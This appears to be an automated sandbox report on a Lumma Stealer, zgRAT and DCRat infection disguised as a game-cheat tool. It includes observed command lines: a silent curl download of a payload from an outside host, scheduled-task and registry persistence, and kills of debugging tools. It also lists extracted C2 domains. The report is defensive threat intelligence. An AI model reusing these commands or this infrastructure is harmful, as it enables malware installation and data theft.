taskkill.exe (PID: 6676 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4768 cmdline: C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1436 cmdline: sc stop KProcessHacker2 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 6124 cmdline: C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7552 cmdline: sc stop KProcessHacker1 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 2084 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

Conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1516 cmdline: C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7364 cmdline: sc stop wireshark MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1132 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 3748 cmdline: taskkill /f /im HTTPDebuggerUI.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1708 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 600 cmdline: taskkill /f /im HTTPDebuggerSvc.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3348 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6136 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6060 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 5956 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5968 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6996 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3452 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1240 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2424 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 2908 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1244 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7996 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2788 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 3408 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2972 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7404 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["agentyanlark.site", "delaylacedmn.site", "famikyjdiag.site", "possiwreeste.site", "explorationmsn.stor", "commandejorsk.site", "underlinemdsj.site", "writekdmsnu.site", "bellykmrebk.site"], "Build id": "1AsNN2--5745481391"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\winlogon.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\winlogon.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Edge\msedge.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Edge\msedge.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: rtcore64.exe PID: 2220	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: msedge.exe PID: 7484	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
52.3.kdmapper.exe.63c66cf.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
52.3.kdmapper.exe.63c66cf.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
52.3.kdmapper.exe.63c66cf.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
52.3.kdmapper.exe.63c66cf.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
52.3.kdmapper.exe.4c616cf.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
52.3.kdmapper.exe.4c616cf.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
161.0.msedge.exe.5f0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
161.0.msedge.exe.5f0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetFilename: C:\Users\user\AppData\Local\winlogon.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\winlogon.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\winlogon.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4932, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, ProcessId: 1868, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\UY9hUZn4CQ.exe", ParentImage: C:\Users\user\Desktop\UY9hUZn4CQ.exe, ParentProcessId: 7304, ParentProcessName: UY9hUZn4CQ.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe, ProcessId: 8000, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 8012, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 4948, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetFilename: C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.cmdline

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4932, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, ProcessId: 1868, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:20.683051+0200	2054653	1	A Network Trojan was detected	192.168.2.10	49719	172.67.197.40	443	TCP
2024-09-30T18:20:24.575237+0200	2054653	1	A Network Trojan was detected	192.168.2.10	49726	188.114.96.3	443	TCP
2024-09-30T18:20:25.990274+0200	2054653	1	A Network Trojan was detected	192.168.2.10	49728	104.21.1.169	443	TCP
2024-09-30T18:20:28.638282+0200	2054653	1	A Network Trojan was detected	192.168.2.10	49733	172.67.197.40	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:20.683051+0200	2049836	1	A Network Trojan was detected	192.168.2.10	49719	172.67.197.40	443	TCP
2024-09-30T18:20:24.575237+0200	2049836	1	A Network Trojan was detected	192.168.2.10	49726	188.114.96.3	443	TCP
2024-09-30T18:20:25.990274+0200	2049836	1	A Network Trojan was detected	192.168.2.10	49728	104.21.1.169	443	TCP
2024-09-30T18:20:28.638282+0200	2049836	1	A Network Trojan was detected	192.168.2.10	49733	172.67.197.40	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:16.889040+0200	2056036	1	Domain Observed Used for C2 Detected	192.168.2.10	62402	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:16.779440+0200	2056040	1	Domain Observed Used for C2 Detected	192.168.2.10	49789	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:17.525474+0200	2056042	1	Domain Observed Used for C2 Detected	192.168.2.10	63652	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:17.496230+0200	2056046	1	Domain Observed Used for C2 Detected	192.168.2.10	58599	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:17.581169+0200	2056052	1	Domain Observed Used for C2 Detected	192.168.2.10	49520	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:16.717882+0200	2056054	1	Domain Observed Used for C2 Detected	192.168.2.10	65184	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:16.795527+0200	2056056	1	Domain Observed Used for C2 Detected	192.168.2.10	51044	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:16.933938+0200	2056058	1	Domain Observed Used for C2 Detected	192.168.2.10	51291	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:20:16.577439+0200	2056172	1	Domain Observed Used for C2 Detected	192.168.2.10	62005	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\winlogon.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\oLoCRyrD.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Windows\Speech\rtcore64.exe	Avira: detection malicious, Label: HEUR/AGEN.1352236
Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\Speech\kdmapper.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\LZthEGCsKS.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\QGjYUwSA.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Edge\msedge.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 65.2.rtcore64.exe.6d050000.4.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["agentyanlark.site", "delaylacedmn.site", "famikyjdiag.site", "possiwreeste.site", "explorationmsn.stor", "commandejorsk.site", "underlinemdsj.site", "writekdmsnu.site", "bellykmrebk.site"], "Build id": "1AsNN2--5745481391"}

Multi AV Scanner detection for dropped file

Source: C:\Edge\msedge.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\winlogon.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\ITDiARjW.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\QGjYUwSA.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XEXXxLMp.log	ReversingLabs: Detection: 25%
Source: C:\Windows\Speech\imxyvi.exe	ReversingLabs: Detection: 70%
Source: C:\Windows\Speech\kdmapper.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\Speech\physmeme.exe	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: UY9hUZn4CQ.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\winlogon.exe	Joe Sandbox ML: detected
Source: C:\Windows\Speech\rtcore64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XEXXxLMp.log	Joe Sandbox ML: detected
Source: C:\Windows\Speech\kdmapper.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MQshNARH.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QGjYUwSA.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\msvcp110.dll	Joe Sandbox ML: detected
Source: C:\Edge\msedge.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: delaylacedmn.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: writekdmsnu.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: agentyanlark.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: bellykmrebk.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: underlinemdsj.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: commandejorsk.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: possiwreeste.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: famikyjdiag.site
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: explorationmsn.stor
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmp	String decryptor: 1AsNN2--5745481391

Source: C:\Windows\Speech\imxyvi.exe

Code function: 28_2_00007FF6A9519150 CryptStringToBinaryA,?_Random_device@std@@YAIXZ,_Query_perf_frequency,_Query_perf_counter,log,cos,sin,exp,pow,tan,memset,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,CryptStringToBinaryA,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,malloc,memcpy,getenv,_flushall,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,free,

28_2_00007FF6A9519150

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49733 version: TLS 1.2

Source: UY9hUZn4CQ.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb,, source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000034.00000002.1496031187.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000000.1468077403.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe.41.dr
Source:	Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
Source:	Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb source: UY9hUZn4CQ.exe
Source:	Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb** source: UY9hUZn4CQ.exe
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
